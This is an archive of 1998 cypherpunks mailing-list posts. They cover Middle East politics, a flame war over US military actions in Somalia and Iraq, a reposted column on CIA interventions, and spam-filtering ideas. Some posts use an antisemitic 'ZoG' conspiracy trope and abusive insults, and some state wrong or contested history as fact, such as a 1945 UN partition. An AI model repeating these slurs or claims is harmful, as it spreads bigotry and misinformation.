And god forbid no one ever mentions the fact that the UN created both a
State of Israel and a State of Palistine in 1945 and the Palistinians
rather than declare thier independence and form a governemnt joined with
the rest of the Arab states in going to war against the Jews currently
living in Palistine. They then were promptly handed their asses by the
Israelies *without* help from the British or the US (as an intresting side
note it was the Russians who were the first to reconise the State of
Israel not any of the western governments).


Now some may wish to extend the lame argument that the British didn't have
the right to carve up the middle east nor did the Jews have the right to
immegrate to Israel. Well the simple fact of the matter is that *every*
country in exsistance today has been created by one group of people
conquering another. All the countries of North *and* South America were
formed that way. The empires of the Incas and Aztecs were formed the same
way. The various tribes of North America gaind control of their "huntting
grounds" by taking them away from those that were there before.


So wine and cry all you want about Israel and the Evil Zionist but they
have the strongest military in the area (and one of the best skilled in
the world) and they have a shitload of Nukes. They ain't going anywhere
with or without any help from the US. (for those of you silly enough to
think the US should force them out or let the Russian backed Arabs do the
job I sugest a reading of the Masada Plan).

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2: Windows with bullet-proof glass.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNO0UDI9Co1n+aLhhAQHSLAP9HAyo1XLrUBDxOAmD6morAc3lWm1BTwT1
Zgy25qU+Ei6wm/xglKA2QJJ3XfxdQKjcKi/KQqtNNiUhAh8sF5vwQzASG1czkRkP
AKEc78EGNT8EaiiPwrSa5+Zm3WSGh9PftpHgPInFXKOGrJrCfo0cyn57Ub5lJLt2
AhVvvDLNAQo=
=XyzX
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 20 Feb 1998 16:15:53 +0800
To: Akshay Vashist <cypherpunks@cyberpass.net
Subject: Re: Cryptographic Implementations
In-Reply-To: <199802180733.NAA15038@u10.serc.iisc.ernet.in>
Message-ID: <3.0.5.32.19980219235016.0089fa80@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 01:03 PM 2/18/98 +0530, Akshay Vashist wrote:
>Hi,
>   Could somebody point me to some of the software implementations
>of the cryptographic algorithms ( RSA , DES ,3DES ) .Actually,
>Iam interested in evaluating their performance on firewalls etc.,
>so if there are sites, that contain their performance metrics/data
>and the time it takes to break them ( approximately , on an average
>m/c say sun ultra sparc ), please  do mail  me.Any help is welcome.

There are a lot of good crypto web and ftp sites.
Look at ftp.ox.ac.uk and ftp.funet.fi .
Look at Ron Rivest's pages (AltaVista knows where they are.)


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Fri, 20 Feb 1998 09:10:09 +0800
To: "Timothy C. May" <paladin@lvcablemodem.com>
Subject: Re: putting down the US military
In-Reply-To: <3.0.5.32.19980219140712.007bda40@pop3.lvcablemodem.com>
Message-ID: <19980220.000732.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

on or about 980219:1407, in <3.0.5.32.19980219140712.007bda40@pop3.lvcablemodem.com>, 
    "Eric J. Tune" <paladin@lvcablemodem.com> was purported to have 
    expostulated to perpetuate an opinion:

>From: Tim May <tcmay@got.net>
>>
>>[SHIT REMOVED]

>>This is why I cheered to see the U.S. gets its tail kicked 
>>in Somalia and have to retreat in disgrace. Alas, the U.S. 
>>planners just looked for another war, one we could "win," 
>> and they found a bombed out Bosnia to be the perfect place 
>>to "restore our dignity."
>>
>>Amerika the Fascist.
>>
>>--Tim May
>>

Eric J. Tune wrote:

>You know Tim, I respect most of what you write, and I respect
>you in that you have your own free will and opinions and the
>right to express them, but what you have forgotten in your
>anarchistic ravings is that PEOPLE DIED IN SOMALIA, including a
>personal friend of mine.  They were all somebody's son, brother,
>and friend  [snip]
>
    my oldest son's LAR recon/black unit had been stood down for
    Somalia, gear turned in, etc.  we were finishing Christmas 
    dinner [two additional NCO's who did not live close enough
    to 29 Palms were also guests] --just about 4pm, the 'phone 
    rang...  I knew, and they knew. Bush had decided to go to 
    Somalia and the powers grabbed an always on standby high
    power unit: 21 LAV25s, etc.  vehicles and all were on C5s in
    14 hours. 

    having personally received those calls before does not
    prepare you for the call when it is _your_ son heading out
    for his first chance to stare the beast in the face and 
    stand it down...  or come home in a body bag.

Eric J. Tune wrote:

>The next time you "cheer to see the U.S. gets its tail kicked",
>why don't you think about the American troops who lost their
>lives or were maimed, or who were doing something they may have
>been personally and morally against, but they chose to be
>professional soldiers, and instead of displaying cowardice, they
>tried to do what was asked of them. [snip]
>
    escorting Bush was a piece of cake, but the brass figured 
    they had two of these special recon companies and ordered
    them to secure North Mogadishu --they did and were shipped 
    stateside; then Army's 10th Mountain got its ass kicked for
    some of the dumbest logistics planning, including the pickup 
    armor column getting lost, no water, and no night vision
    goggles...  then Uncle put its tail between its legs and
    came home.

    how do you think the all the families with sons, husbands,
    lovers, siblings, etc. felt with the spectacle of a dead
    (and initially unidentified pending notification of 
    kin) service man out there just doing his duty for
    his country is being dragged around the dirt streets of a
    shithole?  the boy's parents saw it on television before
    the Army could get a man out to their house to tell them 
    (yes, it is done in person).

    my _boy_ came home a changed _man_ after live ammo on live
    targets and no rubber bullets --and did what all returning  
    jarheads do after first blood --got married as soon as 
    possible.

Eric J. Tune wrote:

>Your "cheering" was a blatant slap in the face to anyone who has
>ever served in uniform. [snip]
>
    absolutely. misplaced criticism and a personal offense to me
    as well as all other servicemen.

    it is one thing to deplore the various wars, police actions,
    dirty tricks, etc. which the U.S. Presidents and spook shows
    are always using to defend "our" interests around the world 
    -it is another to criticize and ridicule the men who fight 
    and die. 

    I have no regrets for what I did, and did too well, but I
    sure as hell have regrets for whom it was done: total
    sleezeballs who have taken TR's maxim to mean: "speak loudly 
    and use a big stick" --it's only business, son.

>...with the right to our freedom of speech comes a
>responsibility to speak wisely..
>
    well, on this point, the thorn of what is "wisely" is 
    defined differently by everyone; freedom of speech is just
    that-- if we restrict Tim's, then we lose our own freedom.

        Tim gets to say his piece, 
        and we get to lump it      --or lump Tim.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNOzVpbR8UA6T6u61AQGN/QIAnQC2/ZUMCwT9M1hLToVdwETxSIkn3zah
4kYcPausEzc4FB64Pomg5CI2UKgiozCGrfv79ijwQmC3cn848lWxSQ==
=GjmF
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 20 Feb 1998 16:20:49 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Dealing with Spam, Part 2
In-Reply-To: <2358.199802181427@cronus>
Message-ID: <3.0.5.32.19980220001517.008a6300@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:27 PM 2/18/98 +0000, T.G.Griffiths@exeter.ac.uk wrote:

>Mark@unicorn.com makes a good point about MailGuard.
>If A and B both run MailGuard, and neither is on the
>other's allowed list, do you get an infinite bounce
>when A mails B or does the prog. get around it? I can
>think of a couple of ways, but what does MailGuard do?

The classic implementations of systems like that do
one of three things
0) Don't think, leading to infinite mailbounces
	(often caught in testing, since it's very bad.)
1) Prevent loops, but there's no way to communicate
2) Prevent loops, and recognize mail from other MailThingies,
	which makes it easy for Spammers to forge.

If you get fancy, you can probably work something like
	Receive message
	Send and record Alice-cookie ->
			<-- Reply with Alice-cookie and new Bob-cookie
	verify Alice-cookie and accept message
	Reply to Bob-cookie
			--> Verify Bob-cookie for future use

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Fri, 20 Feb 1998 14:39:55 +0800
To: cypherpunks@cyberpass.net
Subject: The Political Education of Eric Tune
In-Reply-To: <3.0.5.32.19980219204255.007c3680@pop3.lvcablemodem.com>
Message-ID: <199802200632.AAA01478@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



"Eric J. Tune" <paladin@lvcablemodem.com> writes:
 
> You ever served in the military?  Unless you've been under fire, you
> should shut the fuck up about shit you know nothing about nor could
> comprehend.
 
Similarly, only rapists should judge other rapists, only murderers
other murderers, only SS members other SS members, and only soldiers
other soldiers, only tyrants other tyrants, only gas-chamber operators
other gas-chamber operators.
 
Waaaaaaa!  The Baby-Napalmers of the world cry, no one "understands"
us.
 
> Listen up jerk, in case you didn't get any news during 1990, Iraq
> attacked Kuwait, and murdered thousands of Kuwaitis.
 
Iraq, mislead by the US into believing that there would be no
interference in its long-standing dispute with Kuwait, annexed it,
providing a pretense for the US to do some dirty work for the
Israelis, who did not want to tolerate an Arab military giant in their
region.
 
Kuwait provoked Iraq far more than places like Panama and Grenada have
provoked the United States, when US forces poured in to remove
existing governments, and install regimes sympathetic to Washington,
also killing thousands of uninvolved civilians.
 
Then again, perhaps you believed the touching "Baby Incubator" story
performed by the daughter of the Kuwaiti ambassador for an
appreciative Congress, who were unaware of who she was, or that she
was lying through her teeth.  Perhaps you were also unaware that
American public opinion during the Persian Gulf War was under the
control of a domestic public relations firm hired by the government of
Kuwait.
 
> "Don't start no shit and there won't be no shit"... ever heard that,
> asshole
 
America always manages to find some pretense to fight the wars it
decides to fight.  Sometimes there is a staged attack, and an
arrangement for allies to "invite" us into the conflict.  Other times,
some imagined threat, like the chance that an infant formula factory
"could be used" to produce material that "might be used" for chemical
or biological warfare. Most of us who have watched the antics of
America for more than a few decades see through the transparent
rhetoric employed in such situations to manufacture public consent.
 
> America would have never been involved if Iraq hadn't invaded Kuwait.
 
Well, at least another pretense would have had to be engineered to
implement the ZoG agenda.
 
> I was there, in a Bradley,
 
Next time, try under a Bradley.
 
> and we could have rolled all over Baghdad, especially after what the
> Iraqi bastards did to the Kuwaitis, but it wasn't done. Unfortunately
> Saddam Hussein stayed in power.  There will not be a shred of a
> chance for peace in that region until he is DEAD.
 
Right.  Let's kill the only secular leader of the only secular
government in a region full of religious fruitcakes that either
believe that God has awarded them other peoples land in the Bible, or
that lopping off body parts is the appropriate punishment for
criticizing nonsense.  I didn't see Sadaam Hussein issuing any death
sentences against Salmon Rushdie.
 
> I don't think air strikes are the answer to this, and I think Clinton
> is a moron for his present policy, War is the worst thing that man can
> do to other men, and there is no such thing as "the good fight"... war
> is hell. Period.  Until you have been in a war, you have no idea of
> what you are talking about.
 
It's interesting that the nation that engaged in continuous national
nonstop whining over the kids in the exploding federal building
daycare center commits such crimes at the drop of a hat in other
countries, merely to send some ambiguous foreign policy message.
 
> But if you think that Iraq was "more right" or better yet, "less
> wrong", you need a radical lobotomy, or perhaps you've already had
> one.
 
I would be more than happy to put Sadaam in charge of Israel, Iran,
Saudi Arabia, and the UAE.  You know, Iraq is a multicultural nation.
It even has a Jewish communuity.  That's why "secular" is always
better than a religious state stuffing organized superstition and
paternalistic Sky-God fairy tales down the throats of its subjects.
 
> Evidently, you again know nothing of what the Iraqis did to the
> Kuwaitis on their way in to Kuwait.  Get educated, shithead.
 
So the fact that Iraqis may have mistreated Kuwaitis justifies George
Bush's order to destroy "everything that moves" on the only path out
of the impending American invasion, including civilians fleeing for
their lives with children in carseats?  That's the kind of logic I'd
expect from a professional babykiller.
 
> You sound like nothing more than disillusioned, spoiled, pompous
> asshole when you presume to know what Americans "understand".  Your
> anarchistic ravings only mark you for the idiot you are.
 
If you'd get your commanding officers cock out of your ass, and stop
listening to the propaganda they feed you, then maybe you would be
worthy of further discussion.
 
You have the choice to not join an army that commits atrocities on
foreign soil, and to refuse orders which conflict with whatever
remaining conscience you have.  If you join, and you go over there,
and you kill people, then you are no better than any other murderer.
 
Middle Eastern affairs pose no threat to the Constitution of the
United States, which is, after all, the only thing you are empowered
to defend by shooting at others.
 
> To everyone else besides Cordian who reads this, my apologies, but
> for all it's failings, I still have pride in America... ...not for
> all the foreign policy bullshit or the way the government fucks us
> over, or starts wars, or sticks their collective nose in other
> countries business...but for the fact that as a whole people,
> Americans still keep trying, everyday, to be a better people. I'm
> proud of that.
 
America needs a low-level format.  Soon.

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 20 Feb 1998 17:32:00 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Declan pro-cencorship (sorta) (fwd)
In-Reply-To: <199802151803.MAA24764@einstein.ssz.com>
Message-ID: <3.0.5.32.19980220005636.007e6a00@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Unlike the rest of this discussion, Jim is mostly right here,
and in a way that neither censors anyone nor discourages them
from providing filtering services for people who want it.
However, Wabe is reinventing NoCeMs - which support multiple 
NoCeM issuers, and you can pick any one or more that you like
to kill off spam for you before you read it.  I'm not sure
how widely available implementations of NoCeM mailreaders are;
probably they're mostly Emacs macros.

On the other hand, while the Cypherpunks list gets lots of noise,
it doesn't get much spam (except when somebody's targeting it),
Filters that pick out the most interesting 10% are much more useful
than filters that discard the bottom 10%.
Attacking the list, while less suicidal than spamming alt.2600,
is still not very bright, given the potential risks :-)



>> Date: Sun, 15 Feb 1998 12:40:39 +0000
>> From: wabe <wabe@smart.net>
>> Any reason Cyperpunks couldn't set up a distributed "spam innoculator?"
>> 
>> If I get spam, I'd send it to "spam@cypherpunks.com" and then spam would
>> send a fingerprint to all of our modified netscape messengers, which have been
>> programmed to erase any messages which match that fingerprint.
>> 
>> Then, if one person sees a spam message and declares it spam, no one
>> else has to see it. (If they get the message from spam@cypherpunks in time.)

At 12:02 PM 2/15/98 -0600, Jim Choate wrote:
>What makes you think you are suitable to decide what others want to see?
>How is this any different than any other form of censorship? This exact
>issue is why the CDR was setup with multiple nodes.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Sat, 21 Feb 1998 06:16:47 +0800
To: cypherpunks@toad.com
Subject: PK & Re: Is spam really a problem?
Message-ID: <199802200602.BAA18990@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From sunder@brainlink.com Thu Feb 19 15:43:54 1998
   >   
   >   Information Security wrote:
   >   
   >   >    >   From sunder@brainlink.com Wed Feb 18 15:58:46 1998
   >   >    >
   >   >    >   Anonymous wrote:
   >   >    >   >
   >   >    >   > I see discussion of spam here and everywhere on
   >   >    >   > the net. But who finds it a *real* problem, and
   >   >    >   > why?
   >   > 
   >   > Why are you asking the cypherpunks list?
   >   
   >   I didn't. Anonymous did.  

Seth Breidbart (Mr. BI>20 == SPAM) insists it is a valid style
of attribution to give it once at the top.

My question was obviously directed at "Anonymous".

So you don't get confused again, I'll keep repeating the attributions:


   >   From sunder@brainlink.com Thu Feb 19 15:43:54 1998
   >
   >   Information Security wrote:
   >
   >   >    >   From sunder@brainlink.com Wed Feb 18 15:58:46 1998
   >   >    >
   >   >    >   There are nice technical solutions to this.  If sendmail
   >   >    >   didn't transport things unauthenticated it could be done,
   >   >    >   but at a cost in CPU cycles on mail servers:
   >   >    >
   >   >    >   Have every sendmail server use a PK scheme to talk to
   >   >    >   every other server and authenticate the connection.
   >   >    >   Have every sendmail server accept mail only from those
   >   >    >   whose key is verified.
   >   > 
   >   > Nonsense.
   >   > 
   >   > We (NANA) already know where spam comes from,
   >   > and when we complain about it, they are terminated.
   >   
   >   Until someone else gets a throw away $10 account and uses it to 
   >   spam, right?  By the time you track'em down, they already gave up
   >   that account.  All ISP's do is to delete the spamming account, which
   >   the spammer doesn't care about anyway.  So you achive nothing.

Talk about achieving nothing: what does server-to-server authentication
have to do with overcoming spam from throw-away accounts?

Hey, at least ISPs are making money from terminating accounts. ;-)



   >   From sunder@brainlink.com Thu Feb 19 15:43:54 1998
   >
   >   Further one can generate fake headers and you would not know exactly
   >   where it comes from, though you could have some idea since it would
   >   be one of many sites it was relayed from.  One could send messages
   >   from an ISP that doesn't mind spammers who won't help you track down
   >   the bitch that just slimed your machine, etc.

Jeez, take a breath between thoughts, will ya?

It is standard practice to trust only the last "Received" line.

What of it?

Again: what does server-to-server authentication have to do with
known unhelpful ISPs?



   >   From sunder@brainlink.com Thu Feb 19 15:43:54 1998
   >
   >   Information Security wrote:
   >    
   >   > PK authentication would change nothing.
   >   > 
   >   > Show a single spam with a forged IP address.
   >   
   >   IP addresses won't be forged, but one could send
   >   a mail with extra Recieved-By: headers, etc.

And how would throw-away accounts be affected by your proposed
massive change in SMTP protocol?





   >   From sunder@brainlink.com Thu Feb 19 15:43:54 1998
   >
   >   Information Security wrote:
   >    
   >   > PK authentication would only lead us down the
   >   > road of everyone being tattooed with barcodes
   >   > of our own making - and incredibly dumb idea.
   >   > 
   >   > It would be like requiring a smart card for Internet access.
   >   
   >   Bullshit.  PK auth with a central repository would be Big Brotherish.
   >   Having each user gen their own PK pair is what I suggested.

But these keys must be registered somewhere: whether it's at a centralized
site or distributed, *requiring* everyone to have a digital signature for
Internet access is twisting this elegant crypto-related technology: to
number each and every one of us, and is exactly what will make CDA legal,
because as soon as it's in place attributes such as "age" will be attached.

Required identity repositories are a bad idea.



   >   Relaying is a big problem.

What, you want _me_ to solve the UCE problem?

Okay.

I think if Brad (EFF Director) Templeton's whitelist system were
made available at the firewall/enterprise level, then widely
deployed, spam would be dead.

It's a handy little bot-reply mechanism that asks unknown authors
to verify they aren't sending UCE, else face a monetary penalty.

Replying correctly automatically causes the original email to go through.

Thus achieving the legal right to sue the spammer without
the legislation CAUCE is pushing.

The most important part of this design is that it requires
no control-freak changes to the Internet.

Don't suggest solutions that *require* digital signatures of everyone.

Sheesh.


This might work too:

Throttle email going through the ISP's mailserver.

Maybe 5/minute limit, flagging attempts to go faster to the admins.

As for direct PPP connectivity, upgrade router software to throttle.
(Port SMTP traffic)

Certain people, at the ISP's choice, would have a higher limit,
for mailing lists and such.
---guy

   Think.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Fri, 20 Feb 1998 09:41:19 +0800
To: "Eric J. Tune" <cypherpunks@cyberpass.net>
Subject: onward, Clinton soldiers / not so fast, Sen. Lott
Message-ID: <19980220.000200.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

    let's put the Saddam affair in perspective; I'm sure anyone 
    who is generally enlightened will agree that Bubba needs a
    nice little war to distract attention from his impending 
    doom from a wandering dickhead which Hillary obviously does 
    not, and has not, serviced adequately. 

    Eric Margolis, whom I have known for many years, is an
    American, and a Vietnam veteran, on the staff of the Toronto
    Sun, who went to Canada for editorial freedom. he calls it
    like he sees it, and the following article on American's
    failed MidEast foreign policy since WWII should be must
    reading for the war mongers who have never learned their 
    history and are about to repeat it.

    _________________________ NOTICE ______________________

    In accordance with Title 17 U.S.C.  Section 107, this
    material is distributed without profit to those who have
    expressed a prior interest in receiving the included
    information for research and educational purposes.
    _______________________________________________________

                         NOT SO FAST, SEN. LOTT!
                             by Eric Margolis
                             Toronto Sun Editorial Columnist
                             February 16, 1998

Senate majority leader Trent Lott and other senior Republicans
are demanding the US adopt a long-term strategy of covert action
and subversion to overthrow Saddam Hussein and other Mideast
troublemakers who disturb the Pax Americana.

Bombing Iraq is simply not enough, warned war-fevered
Republicans.  Saddam must be driven from power once and for all.
Many pro-Israel Conservatives demand the US Army march on
Baghdad.

If Senator Lott knew Mideast history better, he might not be so
eager for covert action, or hopeful Iraq's government could be
overthrown to America's profit.  He might even learn the United
States is not the solution to the Mideast's chronic instability
and tensions, but a major source.  A few examples:

*1947 

Washington is displeased by Syria's government.  A CIA-Army
`political action team' mounts a coup, employing a `CIA asset,'
Gen. Husni Za'im.  As senior CIA Mideast agent Miles Copeland
delightfully recalls, the Americans kept calling Za'im `our
boy,' or `Husni,' and ordering him about.  The day after Za'im's
coup, Copeland and the American agents went to inform the new
dictator whom he would appoint as ambassadors and cabinet
ministers.  When the Americans called him, `Husni,' Za'im
ordered them to `stand at attention,' and address him as
`Excellency.'  US-Syrian relations have been terrible ever
since.  Two subsequent, US-backed coups backfired.

*1952

The US helps engineer a coup against British puppet ruler of
Egypt, King Farouk.  CIA backs a young colonel, Gammal Abdel
Nasser.  But when the US later tries to pressure Nasser into
joining Washington's `new order' for the Mideast, the Baghdad
Pact, Nasser rebels and becomes America's enemy number one.  CIA
tries first to overthrow, than assassinate Nasser.  All attempts
fail.

*1953

Iran's popular, elected leader, Mohammed Mossadegh, attempts to
assert Iranian control of his nation's oil industry, whose
profits go to the US and Britain.  A CIA coup overthrows
Mossadegh, and puts `our boy' Reza Shah on the throne.  Iran's
US-trained secret police keep the Shah in power through a reign
of terror.  Islamic-nationalist revolution sweeps Iran in 1979,
ending US domination.

*1957/58

US and Britain thwart popular uprisings against King Hussein of
Jordan.

*1958 

Washington installs a client regime in Lebanon, which then
dutifully calls for US troops.  Beginning of Lebanon's 35 years
of instability and civil war.

*1958

Britain's Iraqi puppets, King Faisal and Nuri as- Said,
overthrown by the bloodthirsty Col. Kassim.  US uses Kassim to
attack Nasser.  Kassim murdered by Col. Aref in CIA-mounted
coup.  Aref's helicopter blown up.  A few more murders later,
CIA helps engineer into power a promising, young, Baath Party
enforcer, Saddam Hussein,

*1960

Anwar Sadat goes on CIA payroll.  After Nasser's death, CIA puts
Sadat into power in Egypt.  Corrupt and hated, Sadat is
assassinated to great popular joy..

*1969

The US elbows Britain out of Libya to gain control of its
high-grade oil.  CIA overthrows British puppet, King Idris, and
- - in one of its most brilliant moves - helps into power a young,
reformist colonel, Muammar Khadaffi.  When Khadaffi subsequently
trumpets the Arabs are being robbed of their oil by the west,
and raises prices, he goes unto America's hit list.

*1976

US, Iran and Israel secretly arm Iraq's Kurds and promote their
rebellion to destabilize Iraq.  Kurdish revolt plays major role
in igniting Iran-Iraq War 1980-1988 in which one million died.
US abandons Kurds, gets chummy with Baghdad.

*1980

Saddam Hussein becomes America's most important Mideast ally in
trying to crush Iran's Islamic revolution.  Urged on, armed and
financed by the US, Saddam invades Iran in 1980.  CIA and
Pentagon supply military advice and intelligence on Iran.  US
and British intelligence help Iraq obtain its chemical and
biological warfare capabilities.

*1983

US attempts to install a client, Christian/fascist regime in
Lebanon, drive out Syrian influence.  US Marines sent to Beirut,
under cover of `peace-keepers.'  They are bombed out of Lebanon
by Shia militants:  309 Americans die, including CIA's top
Mideast staff.

*1985

CIA's revenge backfires.  Lebanese CIA agents detonate truck
bomb in Beirut in a failed attempt to assassinate Shia leader,
Sheik Fadlallah.  Eighty-three civilians killed, 240 wounded.

*1986

US tries to assassinate Khadaffi by bombing his residence in
Tripoli.  One baby daughter killed, one injured.  He escapes.
Downing of Pan Am and French UTA flights may be revenge for this
failed hit.  Three other attempt to assassinate Khadaffi, using
CIA-organized Libyan exiles, fail.

*1996

The Bay of Camels - CIA's biggest flop since Cuba.  Urged on
by President Clinton, CIA mounts an elaborate coup against
Saddam Hussein.  Iraqi exiles, armed and trained by CIA, to
march on Baghdad from US/British ruled Kurdistan.  CIA organizes
a cabal of generals to assassinate Saddam.  Public places in
Baghdad are bombed, many civilians killed, in order to
`destabilize' Iraq (this while the US is busy denouncing
terrorism).  But Saddam's spies have infiltrated the plot.  The
whole operation collapses.  CIA's agent network in Iraq is
rolled up.  Many Kurds back Saddam, turn on pro-US Kurds.  CIA
agents in Kurdistan run for their lives, abandoning allies and
tons of documents.  Saddam is strengthened.  CIA's inept
Director, John Deutch, fired for this Mother of All Fiascos.  .

Republicans now urge more of the above to keep the Mideast
calm. You certainly can't argue with success.

copyright   eric margolis   1998



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNOzdC7R8UA6T6u61AQGciwH8DV95VLZFazEpV9YOI7xaItpsq2892hlW
LsEgcfoDRAPp4qHworr1kFymnzNpJXToj1KGO6/yyoEam8Xjw/MBig==
=8rR0
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 20 Feb 1998 17:34:39 +0800
To: Jim Choate <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Declan pro-cencorship (sorta) (fwd)
In-Reply-To: <199802152303.RAA27009@einstein.ssz.com>
Message-ID: <3.0.5.32.19980220010711.008ae250@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 05:03 PM 2/15/98 -0600, Jim Choate wrote:
>Then you are saying that the only way to send email to yourself, for
>example, is to contact you prior to the transmission and obtain your
>permission to send the traffic?

That's fine - people who take this approach may get less mail
from interesting people as well as getting less mail from spammers.
It's easy to find mail forwarding systems that don't cost much
and will filter out well-known spam, either for free or for a small fee.
Pobox.com offers this, and I think the iname.com systems do also;
I don't know about hotmail and other web-based mailreaders.

>Why should the fact that I have a mailbox on my front porch while you use a
>mailbox (that you pay extra for) at the post office matter to my ability to
>send you a letter in the mail? Should I call you on the phone and ask your
>permission before sending it? Should I not get some mechanism to contact
>you before contacting you using the phone? No ,I assume because local calls
>are flat rate and therefore don't increase your out of pocket expense? Then
>perhaps the problem is you're choice of payment for net connections? Why
>does your choice of personal expense effect my ability to send traffic?

Most of us have flat-rate email, and the important cost is 
our attention span, not the transmission cost.  For other people,
that's not true, and sending them junk mail _is_ ripping them off
financially as well as ripping off their time and concentration.

As far as "how do you know something is bulk mail"?  The sender knows,
and the sender is the one being rude to thousands of receivers
if it is bulk mail.

>If we accept the free-market view then we should expect all net connections
>to be flat rate since this provides the consumer, the final arbiter in
>free-market theory, the most bang for the buck.

This does not apply in countries that still have
Government-granted Monopoly Postal/Telephone/Telegraph companies.
It also doesn't apply in places where the Telephone Company
decides to charge for connect time by the minute rather than
flat rate - even if your internet provider is flat rate,
you may be paying 1-5 cents/minute - mildly annoying on a 
US salary, and much more so on a Polish salary.

And in a free market, you'd expect a mix of options,
since different people have different net connection needs,
financial constraints, and communications costs.
My main ISP offers an 800 number for about 10 cents/minute,
and I sometimes use it when I'm on the road at hotels with
stupider-than-usual telephone systems.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 20 Feb 1998 17:31:38 +0800
To: "Robert A. Costner" <ravage@ssz.com>
Subject: Re: Declan pro-cencorship (sorta) (fwd)
In-Reply-To: <199802180120.TAA06603@einstein.ssz.com>
Message-ID: <3.0.5.32.19980220011234.0089a100@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Unfortunately, there's a conflict between real definitions of spam
(you knew it when you sent it, and the recipients knew it too)
and the real-world problems encountered with blocking/canceling spam,
which tends to result in either censorship or under-blocking.
Number of recipients _isn't_ the right criterion at all -
but it's objective enough to agree on, and usually makes a
clear enough boundary between most spammers and most non-spammers.
Rigidly defining numerical limits can also have serious problems,
because there are good messages that get excluded.

The more important number is the number of people deciding
which things are and are not spam - "More than 1" is best,
while "There can be only one" is censorship, either deliberate
or as a side-effect.

At 10:52 PM 2/17/98 -0500, Robert A. Costner wrote:
>At 07:20 PM 2/17/98 -0600, Jim Choate wrote:
>>So, we actualy do agree that the number of recipients is irrelevant.
>
>When it comes to spam, the ONLY thing that is relevant is the number of
>recipients, and whether these recipients have offered some form of implicit
>or explicit permission to receive the email.  
...
>Any attempt whatsoever to define spam in terms of content and how liked or
>not liked the message is, interferes with traditional 1st amendment
>definitions of speech, if codified in law or promulgated through (gov't)
>rules.  Ignoring first amendment concerns, any attempt to define spam in
>terms of anything other than numbers causes a severe curtailing of the true
>communication and business purposes of the internet.  


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 20 Feb 1998 17:33:29 +0800
To: Fisher Mark <cypherpunks@cyberpass.net>
Subject: RE: financial incentives for hashcash?
In-Reply-To: <83C932393B88D111AED30000F84104A70A1F27@indyexch_fddi.indy.tce.com>
Message-ID: <3.0.5.32.19980220012637.008994c0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:13 PM 2/17/98 -0500, Fisher Mark wrote:
>I am curious -- does anyone have any statistics on how much spam (what
>percentage) is done via SMTP relay?  To me, using the SMTP service of
>someone/something you don't know to send 1000's/10,000's/more of email
>messages seems pretty unfriendly at best.  

Yes, it's one of the major techniques used by spammers;
the other big one is disposable accounts.
maps.vix.com has information about the Realtime Blackhole List
system, which lets you configure your sendmail system to reject
incoming mail from any system that permits relays,
and provides lots of information about setting your system
